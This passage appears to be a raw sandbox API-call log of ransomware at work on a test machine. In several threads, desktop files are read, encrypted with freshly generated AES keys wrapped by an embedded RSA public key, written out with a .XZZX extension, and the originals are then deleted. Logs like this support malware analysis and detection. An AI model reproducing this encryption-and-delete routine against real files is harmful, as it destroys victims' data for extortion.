lpString1=0x2caf460, lpString2="JYsb.gif" | out: lpString1="JYsb.gif") returned="JYsb.gif" [0164.889] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0164.889] SetErrorMode (uMode=0x1) returned 0x1 [0164.889] lstrcpyW (in: lpString1=0x2caf860, lpString2="JYsb.gif" | out: lpString1="JYsb.gif") returned="JYsb.gif" [0164.889] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xfae6b2d2, Data2=0x1b2a, Data3=0x4061, Data4=([0]=0x8f, [1]=0x25, [2]=0x9e, [3]=0x67, [4]=0x6a, [5]=0xe9, [6]=0x1c, [7]=0xb5))) returned 0x0 [0164.889] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JYsb.gif") returned 50 [0164.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0164.889] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7EB57C7406D4CAEAFAE6B2D2099FAF32.XZZX") returned 79 [0164.889] StrStrW (lpFirst="JYsb.gif", lpSrch="XZZX") returned 0x0 [0164.889] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JYsb.gif", dwFileAttributes=0x20) returned 1 [0164.890] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JYsb.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jysb.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0164.890] ReadFile (in: hFile=0x1ac, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0xe4ae, lpNumberOfBytesRead=0x2cae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x2cae418*=0xe4ae, lpOverlapped=0x0) returned 1 [0164.891] CloseHandle (hObject=0x1ac) returned 1 [0164.891] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1c60000 [0164.891] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1c70000 [0164.891] SetErrorMode (uMode=0x1) returned 0x1 [0164.891] lstrcpyW (in: lpString1=0x2cae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0164.891] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc1cb0) returned 1 [0164.894] CryptGenKey (in: hProv=0x3cc1cb0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x43725b8) returned 1 [0165.332] CryptExportKey (in: hKey=0x43725b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x2cae41c | out: pbData=0x0*, pdwDataLen=0x2cae41c*=0x94) returned 1 [0165.333] CryptExportKey (in: hKey=0x43725b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1c70000, pdwDataLen=0x2cae41c | out: pbData=0x1c70000*, pdwDataLen=0x2cae41c*=0x94) returned 1 [0165.333] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0165.333] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0165.333] CryptDestroyKey (hKey=0x43725b8) returned 1 [0165.333] CryptReleaseContext (hProv=0x3cc1d38, dwFlags=0x0) returned 0 [0165.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7EB57C7406D4CAEAFAE6B2D2099FAF32.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7eb57c7406d4caeafae6b2d2099faf32.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x968 [0165.334] WriteFile (in: hFile=0x968, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0xe4ae, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x2cae438*=0xe4ae, lpOverlapped=0x0) returned 1 [0165.335] SetFilePointer (in: hFile=0x968, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe4ae [0165.335] WriteFile (in: hFile=0x968, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2cae438*=0x5, lpOverlapped=0x0) returned 1 [0165.335] SetFilePointer (in: hFile=0x968, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe4b3 [0165.335] WriteFile (in: hFile=0x968, lpBuffer=0x2caf860*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x2caf860*, lpNumberOfBytesWritten=0x2cae438*=0x10, lpOverlapped=0x0) returned 1 [0165.335] SetFilePointer (in: hFile=0x968, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe4c3 [0165.335] WriteFile (in: hFile=0x968, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2cae438*=0x5, lpOverlapped=0x0) returned 1 [0165.336] SetFilePointer (in: hFile=0x968, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe4c8 [0165.336] SetErrorMode (uMode=0x1) returned 0x1 [0165.336] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0165.336] OutputDebugStringW (lpOutputString="end") [0165.336] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v¨\x8eÊ\x03`ÕÊ\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x2cadbf4, pcbBinary=0x2cad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2cadbf4, pcbBinary=0x2cad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0165.336] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2cadbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2cad3dc, pcbStructInfo=0x2cad3d8 | out: pvStructInfo=0x2cad3dc, pcbStructInfo=0x2cad3d8) returned 1 [0165.336] CryptAcquireContextW (in: phProv=0x2cad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2cad3e4*=0x3cc1dc0) returned 1 [0165.336] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc1dc0, dwCertEncodingType=0x1, pInfo=0x437e938*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437e968*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437e970*, PublicKey.cUnusedBits=0x0), phKey=0x2cad3ec | out: phKey=0x2cad3ec*=0x43725b8) returned 1 [0165.336] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0165.337] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0165.337] CryptEncrypt (in: hKey=0x43725b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2cad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x2cad3f0*=0x80) returned 1 [0165.337] CryptEncrypt (in: hKey=0x43725b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc1e48*, pdwDataLen=0x2cad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc1e48*, pdwDataLen=0x2cad3e8*=0x80) returned 1 [0165.337] WriteFile (in: hFile=0x968, lpBuffer=0x3cc1e48*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc1e48*, lpNumberOfBytesWritten=0x2cae438*=0x80, lpOverlapped=0x0) returned 1 [0165.337] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0165.337] WriteFile (in: hFile=0x968, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2cae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2cae438*=0x5, lpOverlapped=0x0) returned 1 [0165.337] GetUserNameW (in: lpBuffer=0x2cae1f8, pcbBuffer=0x2cadfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2cadfe0) returned 1 [0165.337] wsprintfW (in: param_1=0x2cadff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0165.337] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2cadfe4 | out: phkResult=0x2cadfe4*=0x974) returned 0x0 [0165.337] RegQueryValueExW (in: hKey=0x974, lpValueName="E1010314", lpReserved=0x0, lpType=0x2cadfd8, lpData=0x2cadfec, lpcbData=0x2cadfdc*=0x4 | out: lpType=0x2cadfd8*=0x4, lpData=0x2cadfec*=0xe5, lpcbData=0x2cadfdc*=0x4) returned 0x0 [0165.337] RegCloseKey (hKey=0x974) returned 0x0 [0165.337] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2cadfe8 | out: phkResult=0x2cadfe8*=0x974) returned 0x0 [0165.338] RegSetValueExW (in: hKey=0x974, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x2cadfec*=0xe6, cbData=0x4 | out: lpData=0x2cadfec*=0xe6) returned 0x0 [0165.338] RegCloseKey (hKey=0x974) returned 0x0 [0165.338] VirtualFree (lpAddress=0x1c60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0165.338] VirtualFree (lpAddress=0x1c70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0165.338] CloseHandle (hObject=0x968) returned 1 [0165.338] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0165.338] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0165.338] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JYsb.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jysb.gif")) returned 1 [0165.340] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JYsb.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jysb.gif")) returned 0 Thread: id = 555 os_tid = 0xa10 [0165.165] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0165.165] lstrcpyW (in: lpString1=0x29af460, lpString2="Lj26CzXci-whK31.wav" | out: lpString1="Lj26CzXci-whK31.wav") returned="Lj26CzXci-whK31.wav" [0165.165] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0165.165] SetErrorMode (uMode=0x1) returned 0x1 [0165.165] lstrcpyW (in: lpString1=0x29af860, lpString2="Lj26CzXci-whK31.wav" | out: lpString1="Lj26CzXci-whK31.wav") returned="Lj26CzXci-whK31.wav" [0165.165] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xe241bb58, Data2=0x2817, Data3=0x4eb6, Data4=([0]=0x92, [1]=0xae, [2]=0xc, [3]=0x62, [4]=0x77, [5]=0x85, [6]=0x22, [7]=0x42))) returned 0x0 [0165.165] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Lj26CzXci-whK31.wav") returned 61 [0165.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0165.165] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\992D94E80C53825AE241BB580EEE66A2.XZZX") returned 79 [0165.165] StrStrW (lpFirst="Lj26CzXci-whK31.wav", lpSrch="XZZX") returned 0x0 [0165.165] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Lj26CzXci-whK31.wav", dwFileAttributes=0x20) returned 1 [0165.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Lj26CzXci-whK31.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lj26czxci-whk31.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x968 [0165.166] ReadFile (in: hFile=0x968, lpBuffer=0x43d5378, nNumberOfBytesToRead=0x142ef, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43d5378*, lpNumberOfBytesRead=0x29ae418*=0x142ef, lpOverlapped=0x0) returned 1 [0165.167] CloseHandle (hObject=0x968) returned 1 [0165.167] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1cc0000 [0165.167] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cd0000 [0165.167] SetErrorMode (uMode=0x1) returned 0x1 [0165.168] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0165.168] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc1d38) returned 1 [0165.170] CryptGenKey (in: hProv=0x3cc1d38, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x43726f8) returned 1 [0165.562] CryptExportKey (in: hKey=0x43726f8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0165.562] CryptExportKey (in: hKey=0x43726f8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cd0000, pdwDataLen=0x29ae41c | out: pbData=0x1cd0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0165.562] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0165.563] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0165.563] CryptDestroyKey (hKey=0x43726f8) returned 1 [0165.563] CryptReleaseContext (hProv=0x3cc1ed0, dwFlags=0x0) returned 0 [0165.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\992D94E80C53825AE241BB580EEE66A2.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\992d94e80c53825ae241bb580eee66a2.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x978 [0165.564] WriteFile (in: hFile=0x978, lpBuffer=0x43d5378*, nNumberOfBytesToWrite=0x142ef, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43d5378*, lpNumberOfBytesWritten=0x29ae438*=0x142ef, lpOverlapped=0x0) returned 1 [0165.565] SetFilePointer (in: hFile=0x978, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x142ef [0165.565] WriteFile (in: hFile=0x978, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0165.565] SetFilePointer (in: hFile=0x978, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x142f4 [0165.565] WriteFile (in: hFile=0x978, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x26, lpOverlapped=0x0) returned 1 [0165.565] SetFilePointer (in: hFile=0x978, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1431a [0165.565] WriteFile (in: hFile=0x978, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0165.565] SetFilePointer (in: hFile=0x978, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1431f [0165.566] SetErrorMode (uMode=0x1) returned 0x1 [0165.566] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0165.566] OutputDebugStringW (lpOutputString="end") [0165.566] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v¨\x8eÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0165.566] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0165.566] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x3cc1f58) returned 1 [0165.567] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc1f58, dwCertEncodingType=0x1, pInfo=0x437ea08*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437ea38*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437ea40*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x43726f8) returned 1 [0165.567] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0165.567] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0165.567] CryptEncrypt (in: hKey=0x43726f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0165.567] CryptEncrypt (in: hKey=0x43726f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc1fe0*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc1fe0*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0165.567] WriteFile (in: hFile=0x978, lpBuffer=0x3cc1fe0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc1fe0*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0165.568] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0165.568] WriteFile (in: hFile=0x978, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0165.568] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0165.568] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0165.568] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x97c) returned 0x0 [0165.568] RegQueryValueExW (in: hKey=0x97c, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xe6, lpcbData=0x29adfdc*=0x4) returned 0x0 [0165.568] RegCloseKey (hKey=0x97c) returned 0x0 [0165.568] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x97c) returned 0x0 [0165.568] RegSetValueExW (in: hKey=0x97c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xe7, cbData=0x4 | out: lpData=0x29adfec*=0xe7) returned 0x0 [0165.568] RegCloseKey (hKey=0x97c) returned 0x0 [0165.569] VirtualFree (lpAddress=0x1cc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0165.569] VirtualFree (lpAddress=0x1cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0165.569] CloseHandle (hObject=0x978) returned 1 [0165.569] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0165.569] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0165.569] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Lj26CzXci-whK31.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lj26czxci-whk31.wav")) returned 1 [0165.570] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Lj26CzXci-whK31.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lj26czxci-whk31.wav")) returned 0 Thread: id = 556 os_tid = 0xa34 [0165.396] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB 